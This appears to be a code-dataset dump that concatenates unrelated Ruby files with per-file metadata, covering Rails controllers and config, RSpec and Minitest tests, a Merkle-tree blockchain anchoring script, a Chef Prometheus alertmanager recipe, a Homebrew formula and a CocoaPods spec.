01147a9e5956a786a456cfce5c673d65d3aff60e | 934 | require 'test_helper'
describe Enumerize::Base do
let(:klass) do
Class.new do
extend Enumerize
end
end
let(:subklass) do
Class.new(klass)
end
let(:object) { klass.new }
it 'returns [] when not set' do
klass.enumerize :foos, in: %w(a b), multiple: true
object.foos.must_equal []
end
it 'returns setted array' do
klass.enumerize :foos, in: %w(a b c), multiple: true
object.foos = %w(a c)
object.foos.must_equal %w(a c)
end
it "doesn't define _text method" do
klass.enumerize :foos, in: %w(a b c), multiple: true
object.wont_respond_to :foos_text
end
it "doesn't define _value method" do
klass.enumerize :foos, in: %w(a b c), multiple: true
object.wont_respond_to :foos_value
end
it "cannot define multiple with scope" do
assert_raises ArgumentError do
klass.enumerize :foos, in: %w(a b c), multiple: true, scope: true
end
end
end
| 21.72093 | 71 | 0.656317 |
1db24f35cb45c34bfaeb0dd1a784415972b514f8 | 4,617 | #!/usr/bin/env ruby
# encoding: utf-8
require 'optparse'
require 'httparty'
require 'merkle-hash-tree'
require 'digest'
require 'base64'
config_raw = ARGV.pop
config = JSON.parse(config_raw)
def defaultHeaders(token)
{
'Accept' => '*/*',
'Content-Type' => 'application/json',
'Authorization' => 'Bearer ' + token
}
end
def getToken(pia_url, app_key, app_secret)
auth_url = pia_url + '/oauth/token'
auth_credentials = { username: app_key,
password: app_secret }
response = HTTParty.post(auth_url,
basic_auth: auth_credentials,
body: { grant_type: 'client_credentials' })
token = response.parsed_response["access_token"]
if token.nil?
nil
else
token
end
end
def setupApp(pia_url, app_key, app_secret)
token = getToken(pia_url, app_key, app_secret)
{
"pia_url" => pia_url,
"app_key" => app_key,
"app_secret" => app_secret,
"token" => token
}
end
def writeLog(app, message)
url = app["pia_url"] + '/api/logs/create'
headers = defaultHeaders(app["token"])
response = HTTParty.post(url,
headers: headers,
body: { identifier: "oyd.merkle",
log: message }.to_json)
end
# setup
id_array = Array.new
hash_array = Array.new
mht = MerkleHashTree.new(hash_array, Digest::SHA256)
ma = setupApp(config["pia_url"],
config["app_key"],
config["app_secret"])
# puts "Token: " + ma['token'].to_s
headers = defaultHeaders(ma["token"])
# get list of new and updated items
data_url = config["pia_url"] + '/api/items/merkle'
items = HTTParty.get(data_url,
headers: headers).parsed_response
# log entry
writeLog(ma, 'start: ' + items.count.to_s + ' items')
if items.count > 0
# create merkel record
create_merkle_url = config["pia_url"] + '/api/merkles/create'
response = HTTParty.post(create_merkle_url,
headers: headers,
body: { }.to_json ).parsed_response
merkle_id = response['id'].to_s
# process each item
items.each do |item|
item_id = item['id']
item_hash = Digest::SHA256.digest(item['value'])
id_array << item_id
hash_array << item_hash
# puts item_id.to_s + ": " + Base64.encode64(item_hash).rstrip
# write merkel.id in item
update_item_url = config["pia_url"] + '/api/items/' + item_id.to_s
tmp = HTTParty.put(update_item_url,
headers: headers,
body: {
oyd_hash: item_hash.unpack('H*')[0].to_s,
merkle_id: merkle_id }.to_json )
end
if hash_array.length == 1
serialized_object = ""
root_node = hash_array.first.unpack('H*')[0]
else
serialized_object = Base64.strict_encode64(Marshal::dump(mht)).strip
root_node = mht.head().unpack('H*')[0]
end
# puts "===================\n"
# puts "root_node: " + root_node.to_s
case ENV["BLOCKCHAIN"].to_s
when "ARTIS"
blockchain_url = 'http://' + ENV["DOCKER_LINK_BC"].to_s + ':' + (ENV["DOCKER_LINK_BC_PORT"] || "3000") + '/api/create'
response = HTTParty.get(blockchain_url + "?hash=0x" + root_node)
oyd_transaction = response.parsed_response["tx"].to_s
else
# request transaction
blockchain_url = 'http://' + ENV["DOCKER_LINK_BC"].to_s + ':' + (ENV["DOCKER_LINK_BC_PORT"] || "4510") + '/create'
puts "blockchain_url: " + blockchain_url.to_s
puts "merkle_id: " + merkle_id.to_s
puts "root_node: " + root_node.to_s
response = HTTParty.post(blockchain_url,
headers: { 'Content-Type' => 'application/json'},
body: { id: merkle_id,
hash: root_node }.to_json ).parsed_response
# puts "repsonse: " + response.to_s
oyd_transaction = response['transaction-id']
end
# update merkel record and store
update_merkle_url = config["pia_url"] + '/api/merkles/' + merkle_id.to_s
response = HTTParty.put(update_merkle_url,
headers: headers,
body: { payload: id_array.to_json,
merkle_tree: serialized_object,
root_hash: root_node,
oyd_transaction: oyd_transaction }.to_json )
# log entry
writeLog(ma, 'wrote ' + root_node.to_s + ' at ' + oyd_transaction.to_s)
end
# =============
# verify record
# 1) calculate hash from value
# 2) calculate audit proof with serialized mht to proof root_hash
# 3) use transaction to check root_hash in blockchain | 31.841379 | 124 | 0.604722 |
330af35c00515767191e81e3e15111e48cd3b3f3 | 1,121 | BackboneDemo2::Application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
end
| 37.366667 | 85 | 0.773417 |
f8bbb2eef0fbe6bc84031cd73a93bed0df0e30c7 | 88 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "tracker_deliveries"
| 29.333333 | 58 | 0.761364 |
e9560eff75b76085d682d64c239695730053b162 | 1,030 | module VersionedDatabaseFunctions
module Adapters
class Postgres
# Decorates an ActiveRecord connection with methods that help determine
# the connections capabilities.
#
# Every attempt is made to use the versions of these methods defined by
# Rails where they are available and public before falling back to our own
# implementations for older Rails versions.
#
# @api private
class Connection < SimpleDelegator
# An integer representing the version of Postgres we're connected to.
#
# postgresql_version is public in Rails 5, but protected in earlier
# versions.
#
# @return [Integer]
def postgresql_version
if undecorated_connection.respond_to?(:postgresql_version)
super
else
undecorated_connection.send(:postgresql_version)
end
end
private
def undecorated_connection
__getobj__
end
end
end
end
end
| 28.611111 | 80 | 0.640777 |
21cd2260e30540216afa032038e9b53a4858ec20 | 123 | require 'sinatra/base'
class SinatraStem < Sinatra::Base
get '/' do
"Hellllllo! i am Lindsey Lohan!!"
end
end
| 12.3 | 37 | 0.650407 |
ffdc863ce006ddc037af17d9fb246077676873ba | 2,663 | class Admin::UsersController < Admin::AdminController
before_action :set_admin_user, only: [:show, :edit, :update, :destroy]
def initialize(*params)
super(*params)
@category = t(:menu_user,scope:[:admin_menu])
@controller_name = t('activerecord.models.user')
end
# GET /admin_users
# GET /admin_users.json
def index
params[:per_page] = 10 unless params[:per_page].present?
@admin_users = User.order('id desc').page(params[:page]).per(params[:per_page])
respond_to do |format|
format.html # index.html.erb
format.json { render json: @admin_users }
end
end
# GET /admin_users/1
# GET /admin_users/1.json
def show
respond_to do |format|
format.html # show.html.erb
format.json { render json: @admin_user }
end
end
# GET /admin_users/new
# GET /admin_users/new.json
def new
@admin_user = User.new
respond_to do |format|
format.html # new.html.erb
format.json { render json: @admin_user }
end
end
# GET /admin_users/1/edit
def edit
end
# POST /admin_users
# POST /admin_users.json
def create
@admin_user = User.new(admin_user_params)
respond_to do |format|
if @admin_user.save
format.html { redirect_to admin_user_path(@admin_user), notice: @controller_name +t(:message_success_create) }
format.json { render json: @admin_user, status: :created, location: @admin_user }
else
format.html { render action: "new" }
format.json { render json: @admin_user.errors, status: :unprocessable_entity }
end
end
end
# PUT /admin_users/1
# PUT /admin_users/1.json
def update
respond_to do |format|
if @admin_user.update_attributes(admin_user_params)
format.html { redirect_to admin_user_path(@admin_user), notice: @controller_name +t(:message_success_update) }
format.json { head :no_content }
else
format.html { render action: "edit" }
format.json { render json: @admin_user.errors, status: :unprocessable_entity }
end
end
end
# DELETE /admin_users/1
# DELETE /admin_users/1.json
def destroy
@admin_user.destroy
respond_to do |format|
format.html { redirect_to admin_users_path}
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_admin_user
@admin_user = User.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def admin_user_params
params.require(:user).permit(:id, :name, :email, :password, :description, :photo)
end
end
| 26.63 | 118 | 0.674427 |
08b93a38f2743682144e80518a9a3e41944595ac | 1,712 | require 'rails_helper'
require 'shared_context_for_bucket_generators'
module Physiqual
module BucketGenerators
describe EquidistantBucketGenerator do
let(:interval) { 6 }
let(:measurements_per_day) { 3 }
let(:hours_before_first_measurement) { 6 }
let(:subject) { described_class.new(measurements_per_day, interval, hours_before_first_measurement) }
include_context 'bucket_generator context'
describe 'generate' do
before do
@result = subject.generate(from, to)
@dates = @result.map(&:end_date)
end
it 'should output the correct format' do
check_result_format(@result)
end
it 'should generate date buckets as expected' do
current = from.to_date
@dates.each_with_index do |date, index|
expect(date.to_date).to eq current
current += 1.day if ((index + 1) % measurements_per_day) == 0
end
end
it 'should generate the correct number of buckets' do
# +1 because of the last day, which is not included
expect(@result.length).to eq(measurements_per_day * ((to.to_date - from.to_date).to_i + 1))
end
it 'should generate time buckets as expected' do
start = from + hours_before_first_measurement.hours
current = start.dup
@dates.each_with_index do |date, index|
expect(date.hour).to eq current.hour
expect(date.min).to eq current.min
current += interval.hours
current = current.change(hour: start.hour, min: start.min) if ((index + 1) % measurements_per_day) == 0
end
end
end
end
end
end
| 33.568627 | 115 | 0.628505 |
616d7d90500058214aa162993b95f23183085d53 | 322 | require 'rails_helper'
RSpec.describe "albums/show", type: :view do
before(:each) do
@album = assign(:album, Album.create!(
:gallery => nil,
:title => "Title"
))
end
it "renders attributes in <p>" do
render
expect(rendered).to match(//)
expect(rendered).to match(/Title/)
end
end
| 18.941176 | 44 | 0.611801 |
b947c94e23cc0a948c15e79b91e3e7504e1d4eef | 5,504 | # frozen_string_literal: true
class Test
extend MSIDP::Endpoint
end
RSpec.shared_context 'tenant' do
let(:tenant) { 'tenant.example.com' }
end
RSpec.describe MSIDP::Endpoint, '#authorize_uri' do
include_context 'tenant'
subject { Test.authorize_uri(tenant) }
it {
is_expected.to eq URI.parse(
"https://login.microsoftonline.com/#{tenant}/oauth2/v2.0/authorize"
)
}
end
RSpec.describe MSIDP::Endpoint, '#token_uri' do
include_context 'tenant'
subject { Test.token_uri(tenant) }
it {
is_expected.to eq URI.parse(
"https://login.microsoftonline.com/#{tenant}/oauth2/v2.0/token"
)
}
end
RSpec.shared_context 'authorize uri' do
include_context 'tenant'
let(:uri) { Test.authorize_uri(tenant) }
end
RSpec.shared_context 'token uri' do
include_context 'tenant'
let(:uri) { Test.token_uri(tenant) }
end
RSpec.shared_context 'parameters' do
let(:params) { { param: 'param' } }
end
RSpec.shared_context 'Net::HTTP mock' do
let(:http) { instance_double(Net::HTTP) }
before do
allow(http).to receive(:request).and_return(response)
allow(Net::HTTP).to receive(:start).and_yield(http)
end
end
RSpec.shared_context 'HTTP success response' do
let(:response) do
Net::HTTPOK.new(nil, 200, 'OK').tap do |res|
res.content_type = res_contenttype
allow(res).to receive(:body).and_return(res_body)
end
end
end
RSpec.shared_context 'HTTPOK response' do
let(:res_body) { 'HTTP response body' }
let(:res_contenttype) { 'text/plain' }
include_context 'HTTP success response'
end
RSpec.shared_examples 'receiving HTTPOK response' do
include_context 'Net::HTTP mock'
include_context 'parameters'
include_context 'HTTPOK response'
it {
expect(Net::HTTP).to receive(:start)
.with(uri.host, uri.port, anything)
expect(http).to receive(:request).with(
have_attributes(path: path, body: body)
)
is_expected.to be_instance_of(Net::HTTPOK)
.and have_attributes(code: 200, body: res_body)
}
end
RSpec.describe MSIDP::Endpoint, '#get' do
include_context 'authorize uri'
subject { Test.get(uri, params) }
include_examples 'receiving HTTPOK response' do
let(:path) do
uri.dup.tap { |u| u.query = URI.encode_www_form(params) }.request_uri
end
let(:body) { nil }
end
end
RSpec.describe MSIDP::Endpoint, '#post' do
include_context 'token uri'
subject { Test.post(uri, params) }
include_examples 'receiving HTTPOK response' do
let(:path) { uri.request_uri }
let(:body) { URI.encode_www_form(params) }
end
end
RSpec.shared_context 'token response' do
let(:token) { 'TOKEN' }
let(:expires_in) { 3599 }
let(:res_obj) do
{ token_type: 'Bearer', expires_in: expires_in, access_token: token }
end
let(:res_body) { JSON.dump(res_obj) }
let(:res_contenttype) { 'application/json;' }
let(:date) { Time.at(1234) }
include_context 'HTTP success response'
before do
response['date'] = date.to_s
end
end
RSpec.shared_context 'HTTP error response' do
let(:error_code) { 'test_error' }
let(:error_obj) { { error: error_code, error_description: 'Test Error' } }
let(:response) do
Net::HTTPBadRequest.new(nil, 400, 'Bad Request').tap do |res|
res.content_type = 'application/json'
allow(res).to receive(:body).and_return(JSON.dump(error_obj))
end
end
end
RSpec.shared_examples 'rising an error' do
it {
expect { subject }.to raise_error MSIDP::Error, &error_spec
}
end
RSpec.shared_examples 'rising a hash error' do
include_context 'HTTP error response'
let(:error_spec) { ->(e) { expect(e.error).to eq error_code } }
include_examples 'rising an error'
end
RSpec.shared_examples 'rising a text error' do
include_context 'HTTPOK response'
let(:error_spec) { ->(e) { expect(e.body).to eq res_body } }
include_examples 'rising an error'
end
RSpec.describe MSIDP::Endpoint, '#validate_json_response' do
subject { Test.validate_json_response(response) }
context 'with a success response' do
include_context 'token response'
it { is_expected.to eq(response) }
end
context 'with an error response' do
include_examples 'rising a hash error'
end
context 'with an invalid response' do
include_examples 'rising a text error'
end
end
RSpec.describe MSIDP::Endpoint, '#authorize' do
include_context 'Net::HTTP mock'
include_context 'authorize uri'
include_context 'parameters'
subject { Test.authorize(uri, params) }
context 'with a success response' do
include_context 'HTTPOK response'
it {
expect(Test).to receive(:get)
.with(uri, params).and_call_original
is_expected.to eq(response)
}
end
context 'with an error response' do
include_examples 'rising a hash error'
end
end
RSpec.describe MSIDP::Endpoint, '#token' do
include_context 'Net::HTTP mock'
include_context 'token uri'
let(:scope) { 'https://example.com/scope' }
subject { Test.token(uri, { scope: scope }) }
context 'with a success response' do
include_context 'token response'
it {
expect(Test).to receive(:post)
.with(uri, { scope: scope }).and_call_original
is_expected.to be_instance_of(MSIDP::AccessToken)
.and have_attributes(
value: token, scope: [scope], expire: date + expires_in
)
}
end
context 'with an error response' do
include_examples 'rising a hash error'
end
context 'with an invalid response' do
include_examples 'rising a text error'
end
end
| 27.247525 | 76 | 0.697856 |
ff5cbb9262a8ea5c8972f4dae2236bdd9e469333 | 378 | module Spree
module Inventory
module UploadFileActionDecorator
def upload_options
@upload_options ||= { vendor_id: upload_meta.delete(:vendor_id) }
end
def queue_name
slug = Spree::Vendor.find(upload_options[:vendor_id]).slug
"#{slug}-uploads"
end
end
UploadFileAction.prepend(UploadFileActionDecorator)
end
end
| 22.235294 | 73 | 0.677249 |
339d62766a963f20c10281babbea6a388b7112f9 | 232 | module Gitlab
module Git
class Railtie < Rails::Railtie
initializer 'gitlab_git.add_middleware' do |app|
app.config.middleware.insert_before "Rack::Runtime", "Gitlab::Git::Middleware"
end
end
end
end
| 23.2 | 86 | 0.685345 |
0861e54e8e41308a4b6f20e0b3e38fbb75a0ab95 | 279 | require './config/environment'
if ActiveRecord::Base.connection.migration_context.needs_migration?
raise 'Migrations are pending. Run `rake db:migrate` to resolve the issue.'
end
use Rack::MethodOverride
use UsersController
use PupdatesController
run ApplicationController
| 21.461538 | 77 | 0.820789 |
110314c12c9744edecf9f97c8bec72b4817deae8 | 115 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "ruby_wifi_scanner"
require "minitest/autorun"
| 23 | 58 | 0.765217 |
26dee9ca4f6b6992a2567fac63019e6dc43d572a | 1,340 | class DockerFileBuilder
def write_persistent_files
unless @blueprint_reader.persistent_files.nil?
write_comment("#Persistant Files #{@blueprint_reader.persistent_files}")
log_build_output('set setup_env')
paths = ''
src_paths = @blueprint_reader.persistent_files
unless src_paths.nil?
src_paths.each do |p_file|
# p_file[:volume_name] = templater.process_templated_string(p_file[:volume_name])
path = p_file[:path]
dir = File.dirname(path)
file = File.basename(path)
SystemDebug.debug(SystemDebug.builder, :dir, dir)
if dir.is_a?(String) == false || dir.length == 0 || dir == '.' || dir == '..'
path = "app/#{file}"
end
paths += "#{p_file[:volume_name]}:#{path} "
end
write_build_script("persistent_files.sh #{paths}")
end
end
end
def write_persistent_dirs
unless @blueprint_reader.persistent_dirs.nil?
log_build_output('setup persistent Dirs')
paths = ''
write_comment('#Persistant Dirs')
@blueprint_reader.persistent_dirs.each do |p_dir|
path = p_dir[:path]
path.chomp!('/')
paths += "#{p_dir[:volume_name]}:#{path} " unless path.nil?
end
write_build_script("persistent_dirs.sh #{paths}")
end
end
end | 35.263158 | 91 | 0.622388 |
6ad51a745704c68803d0e24bf5fa469a6601e446 | 1,062 | # -*- encoding : utf-8 -*-
require 'spec_helper'
describe 'apt::force', :type => :define do
let :title do
'my_package'
end
let :default_params do
{
:release => 'testing',
:version => false
}
end
[{},
{
:release => 'stable',
:version => '1'
}
].each do |param_set|
describe "when #{param_set == {} ? "using default" : "specifying"} define parameters" do
let :param_hash do
default_params.merge(param_set)
end
let :params do
param_set
end
let :unless_query do
base_command = "/usr/bin/dpkg -s #{title} | grep -q "
base_command + (params[:version] ? "'Version: #{params[:version]}'" : "'Status: install'")
end
let :exec_title do
base_exec = "/usr/bin/apt-get -y -t #{param_hash[:release]} install #{title}"
base_exec + (params[:version] ? "=#{params[:version]}" : "")
end
it { should contain_exec(exec_title).with_unless(unless_query) }
end
end
end
| 24.136364 | 99 | 0.539548 |
4a4d5adad2ede3565b763e3ab7fad0d606885b4e | 1,020 | class Rem < Formula
desc "Command-line tool to access OSX Reminders.app database"
homepage "https://github.com/kykim/rem"
url "https://github.com/kykim/rem/archive/20150618.tar.gz"
sha256 "e57173a26d2071692d72f3374e36444ad0b294c1284e3b28706ff3dbe38ce8af"
bottle do
cellar :any_skip_relocation
sha256 "326f7a21f696b7614a55a5edeb57e08482ff7b4c72506bcecff5deaa0552828e" => :sierra
sha256 "c9892df4f6aa5d58097e4cc4d62388ccbb1e0c02604b1139cfe829d47d992442" => :el_capitan
sha256 "d9a6303ff3935923ba53d093e95387caaf24460a4cd7fb7d330fa5c3988b551c" => :yosemite
sha256 "bf65e89ec4ca486b95f04c1c737627b2e0091af8a5c137795e521b96664d75e2" => :mavericks
sha256 "3c858e09bce1941b84ca3e5d77163cac4e3b7efcd6a1afcc72354a450c8ee495" => :mountain_lion
end
depends_on :xcode => :build
conflicts_with "remind", :because => "both install `rem` binaries"
def install
xcodebuild "SYMROOT=build"
bin.install "build/Release/rem"
end
test do
system "#{bin}/rem", "version"
end
end
| 35.172414 | 95 | 0.786275 |
1ae94ac54f8cc050c98b52bcbd268858eab54ba6 | 1,561 |
Pod::Spec.new do |s|
s.name = "NBUCore"
s.version = "1.9.1"
s.summary = "Convenience extensions and utilities for iOS projects."
s.homepage = "http://cyberagent.github.io/iOS-NBUCore/"
s.license = { :type => 'Apache License, Version 2.0', :file => 'LICENSE' }
s.author = { "CyberAgent Inc." => "", "Ernesto Rivera" => "[email protected]" }
s.screenshots = [ "https://raw.github.com/wiki/CyberAgent/iOS-NBUCore/images/Dashboard.png",
"https://raw.github.com/wiki/CyberAgent/iOS-NBUCore/images/Dashboard_minimized.png",
"https://raw.github.com/wiki/CyberAgent/iOS-NBUCore/images/Dashboard_filter.png" ]
s.source = { :git => "https://github.com/CyberAgent/iOS-NBUCore.git", :tag => "#{s.version}" }
s.platform = :ios
s.source_files = 'Source/*.{h,m}'
s.framework = 'Security'
s.requires_arc = true
s.preserve_paths = "README.*", "NOTICE", "*.xcconfig"
s.dependency 'Lockbox', '~> 1.4.2'
s.dependency 'CocoaLumberjack', '<= 1.6'
s.subspec 'UI' do |su|
su.source_files = 'Source/UI/*.{h,m}'
end
s.subspec 'Helpers' do |sh|
sh.source_files = 'Source/Helpers/*.{h,m}'
end
s.subspec 'Additions' do |sa|
sa.source_files = 'Source/Additions/*.{h,m}'
end
s.subspec 'Dashboard' do |sd|
sd.source_files = 'Source/Dashboard/*.{h,m}'
sd.resources = 'Source/Dashboard/*.{xib}'
end
end
| 38.073171 | 108 | 0.568866 |
ff924732a6bc719520b0763a26de120b42e41911 | 119 | module SavedSearchTestHelper
def mock_saved_search_service!
SavedSearch.stubs(:enabled?).returns(true)
end
end
| 19.833333 | 46 | 0.798319 |
ab2f199c6c0aba99cc5009a54882aa96121a3f9c | 2,724 | #
# Cookbook Name:: prometheus
# Recipe:: alertmanager
#
# Author: Paul Magrath <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
include_recipe 'build-essential::default'
user node['prometheus']['user'] do
system true
shell '/bin/false'
home node['prometheus']['dir']
not_if { node['prometheus']['use_existing_user'] == true || node['prometheus']['user'] == 'root' }
end
directory node['prometheus']['dir'] do
owner node['prometheus']['user']
group node['prometheus']['group']
mode '0755'
recursive true
end
directory node['prometheus']['log_dir'] do
owner node['prometheus']['user']
group node['prometheus']['group']
mode '0755'
recursive true
end
# -- Write our Config -- #
template node['prometheus']['alertmanager']['config.file'] do
cookbook node['prometheus']['alertmanager']['config_cookbook_name']
source node['prometheus']['alertmanager']['config_template_name']
mode 0644
owner node['prometheus']['user']
group node['prometheus']['group']
variables(
notification_config: node['prometheus']['alertmanager']['notification']
)
notifies :restart, 'service[alertmanager]'
end
# -- Do the install -- #
# These packages are needed go build
%w( curl git-core mercurial gzip sed ).each do |pkg|
package pkg
end
git "#{Chef::Config[:file_cache_path]}/alertmanager-#{node['prometheus']['alertmanager']['version']}" do
repository node['prometheus']['alertmanager']['git_repository']
revision node['prometheus']['alertmanager']['git_revision']
action :checkout
end
bash 'compile_alertmanager_source' do
cwd "#{Chef::Config[:file_cache_path]}/alertmanager-#{node['prometheus']['alertmanager']['version']}"
code "make && mv alertmanager #{node['prometheus']['dir']}"
notifies :restart, 'service[alertmanager]'
end
template '/etc/init/alertmanager.conf' do
source 'upstart/alertmanager.service.erb'
mode 0644
notifies :restart, 'service[alertmanager]', :delayed
end
service 'alertmanager' do
provider Chef::Provider::Service::Upstart
action [:enable, :start]
end
# rubocop:disable Style/HashSyntax
service 'alertmanager' do
supports :status => true, :restart => true
end
# rubocop:enable Style/HashSyntax
| 28.978723 | 104 | 0.716593 |
e26d582805c3600f36bb72c4c6b5276a87626907 | 2,793 | # frozen_string_literal: true
require "spec_helper"
describe GraphQL::Relay::ConnectionInstrumentation do
it "replaces the previous field definition" do
test_type = GraphQL::ObjectType.define do
name "Test"
connection :tests, test_type.connection_type
end
assert_equal ["tests"], test_type.fields.keys
end
it "keeps a reference to the function" do
conn_field = StarWars::Faction.graphql_definition.fields["shipsWithMaxPageSize"]
assert_instance_of StarWars::ShipsWithMaxPageSize, conn_field.function
end
let(:build_schema) {
test_type = nil
test_field = GraphQL::Field.define do
type(test_type.connection_type)
property(:something)
end
test_type = GraphQL::ObjectType.define do
name "Test"
connection :tests, test_field
end
[
test_field,
GraphQL::Schema.define(query: test_type, raise_definition_error: true)
]
}
it "leaves the original field untouched" do
test_field, test_schema = build_schema
conn_field = test_schema.get_field(test_schema.query, "tests")
assert_equal 0, test_field.arguments.length
assert_equal 4, conn_field.arguments.length
assert_instance_of GraphQL::Field::Resolve::MethodResolve, test_field.resolve_proc
assert_instance_of GraphQL::Relay::ConnectionResolve, conn_field.resolve_proc
end
it "passes connection behaviors to redefinitions" do
_test_field, test_schema = build_schema
connection_field = test_schema.get_field(test_schema.query, "tests")
redefined_connection_field = connection_field.redefine { argument "name", types.String }
assert_equal 4, connection_field.arguments.size
assert_equal 5, redefined_connection_field.arguments.size
assert_instance_of GraphQL::Relay::ConnectionResolve, connection_field.resolve_proc
assert_instance_of GraphQL::Relay::ConnectionResolve, redefined_connection_field.resolve_proc
end
describe "after_built_ins instrumentation" do
it "has access to connection objects" do
query_str = <<-GRAPHQL
{
rebels {
ships {
pageInfo {
__typename
}
}
}
}
GRAPHQL
ctx = { before_built_ins: [], after_built_ins: [] }
star_wars_query(query_str, {}, context: ctx)
# The second item is different here:
# Before the object is wrapped in a connection, the instrumentation sees `Array`
assert_equal ["StarWars::FactionRecord", "Array", "GraphQL::Relay::ArrayConnection"], ctx[:before_built_ins]
# After the object is wrapped in a connection, it sees the connection object
assert_equal ["StarWars::Faction", "GraphQL::Relay::ArrayConnection", "GraphQL::Relay::ArrayConnection"], ctx[:after_built_ins]
end
end
end
| 33.25 | 133 | 0.717508 |
1db4a66b780d0a17f5fb02a2521f46615a670589 | 2,045 | require File.expand_path(File.join(File.dirname(__FILE__), '..', "helper"))
module SWF
class TestButton < Kedama::TestCase
def test_new_yields
called = false
Button.new { |button|
assert button
called = true
}
assert called
end
def test_button
Movie.new { |movie|
di = nil
shape = Shape.new { |s|
s.line = [2, 255, 0, 0, 255]
s.right_fill = s.solid_fill(255, 0, 0, 255)
s.draw_circle(20)
}
movie.frame { |frame|
di = frame << Button.new { |button|
button.add_character(shape,
Button::HIT|Button::UP|Button::DOWN|Button::OVER)
button.add_action(Action.new('_root.gotoAndStop(2);'),Button::MOUSEUP)
}
frame << Action.new('_root.stop();')
di.move_to(100, 100)
}
movie.frame { |frame|
di.remove
di = frame << Button.new { |button|
button.add_character(shape,
Button::HIT|Button::UP|Button::DOWN|Button::OVER)
button.add_action(Action.new('_root.gotoAndStop(1);'),Button::MOUSEDOWN)
}
di.move_to(50, 100)
}
}
end
def test_rotate_and_move
Movie.new { |movie|
shape = Shape.new { |s|
s.line = [1, 255, 0, 0, 255]
s.right_fill = s.solid_fill(255, 255, 0, 255)
s.draw_line(100, 0)
s.draw_line(0, 40)
s.draw_line(0, 0)
}
movie.frame { |frame|
frame.add(Button.new { |button|
button.add_character(
shape,
Button::HIT|Button::UP|Button::OVER|Button::DOWN
)
button.add_character(
shape,
Button::OVER|Button::DOWN
).rotate(10).move(20, 0)
button.add_character(
shape,
Button::DOWN
).rotate(20).move(40, 0)
}).move_to(50, 100)
}
}
end
end
end
| 26.907895 | 84 | 0.494866 |
ed637e7b04d6b74d0c7a0f7eb73be58dca067473 | 276 | require 'ipconverter/version'
require 'ipconverter/ipconverter'
# Contains the methods for doing IP Address conversions
#
# Example:
# IpConverter.str_to_int('192.168.2.1') # 3232236033
#
module IpConverter
module_function :str_to_int
module_function :int_to_str
end
| 21.230769 | 56 | 0.782609 |
e20ea336cb447ee6f6479c67192f2707a65df800 | 298 | class RoyalTsx < Cask
url 'http://app.royaltsx.com/updates/royaltsx_1.3.0.0.dmg'
appcast 'http://app.royaltsx.com/updates_stable.php'
homepage 'http://www.royaltsx.com'
version '1.3.0.0'
sha256 '2306ae0579b097ccf4796f9cc08012819d3e55d5025a1424c8eca5330cdaedf5'
link 'Royal TSX.app'
end
| 33.111111 | 75 | 0.765101 |
333558d69d11a33a76ff5bb7ea596adf111e1902 | 2,731 | ###
# Do not use this file to override the ruby cookbook's default
# attributes. Instead, please use the customize.rb attributes file,
# which will keep your adjustments separate from the AWS OpsWorks
# codebase and make it easier to upgrade.
#
# However, you should not edit customize.rb directly. Instead, create
# "ruby/attributes/customize.rb" in your cookbook repository and
# put the overrides in YOUR customize.rb file.
#
# Do NOT create an 'ruby/attributes/ruby.rb' in your cookbooks. Doing so
# would completely override this file and might cause upgrade issues.
#
# See also: http://docs.aws.amazon.com/opsworks/latest/userguide/customizing.html
###
include_attribute 'opsworks_initial_setup::default'
include_attribute 'opsworks_commons::default'
case node["opsworks"]["ruby_version"]
when "2.2"
default[:ruby][:major_version] = '2'
default[:ruby][:minor_version] = '2'
default[:ruby][:patch_version] = '4'
default[:ruby][:pkgrelease] = '1'
default[:ruby][:full_version] = [node[:ruby][:major_version], node[:ruby][:minor_version]].join(".")
default[:ruby][:version] = [node[:ruby][:full_version], node[:ruby][:patch_version]].join(".")
when "2.1"
default[:ruby][:major_version] = '2'
default[:ruby][:minor_version] = '1'
default[:ruby][:patch_version] = '8'
default[:ruby][:pkgrelease] = '1'
default[:ruby][:full_version] = [node[:ruby][:major_version], node[:ruby][:minor_version]].join(".")
default[:ruby][:version] = [node[:ruby][:full_version], node[:ruby][:patch_version]].join(".")
when "2.0.0"
default[:ruby][:major_version] = '2'
default[:ruby][:minor_version] = '0'
default[:ruby][:patch] = 'p648' # this attribute will disappear in favor of the sematic versioning schema
default[:ruby][:patch_version] = node[:ruby][:patch]
default[:ruby][:pkgrelease] = '1'
default[:ruby][:full_version] = '2.0.0'
default[:ruby][:version] = [node[:ruby][:full_version], node[:ruby][:patch_version]].join("-")
when "1.9.3"
default[:ruby][:major_version] = '1'
default[:ruby][:minor_version] = '9'
default[:ruby][:patch] = 'p551' # this attribute will disappear in favor of the sematic versioning schema
default[:ruby][:patch_version] = node[:ruby][:patch]
default[:ruby][:pkgrelease] = '1'
default[:ruby][:full_version] = '1.9.3'
default[:ruby][:version] = [node[:ruby][:full_version], node[:ruby][:patch_version]].join("-")
else
default[:ruby][:major_version] = ''
default[:ruby][:full_version] = ''
default[:ruby][:patch_version] = ''
default[:ruby][:patch] = '' # this attribute will disappear in favor of the sematic versioning schema
default[:ruby][:pkgrelease] = ''
default[:ruby][:version] = ''
end
include_attribute "ruby::customize"
| 39.57971 | 108 | 0.691688 |
7a988b7828d20471d3e62400768ff31c3036b025 | 4,410 | # Copyright (c) 2018 Yegor Bugayenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
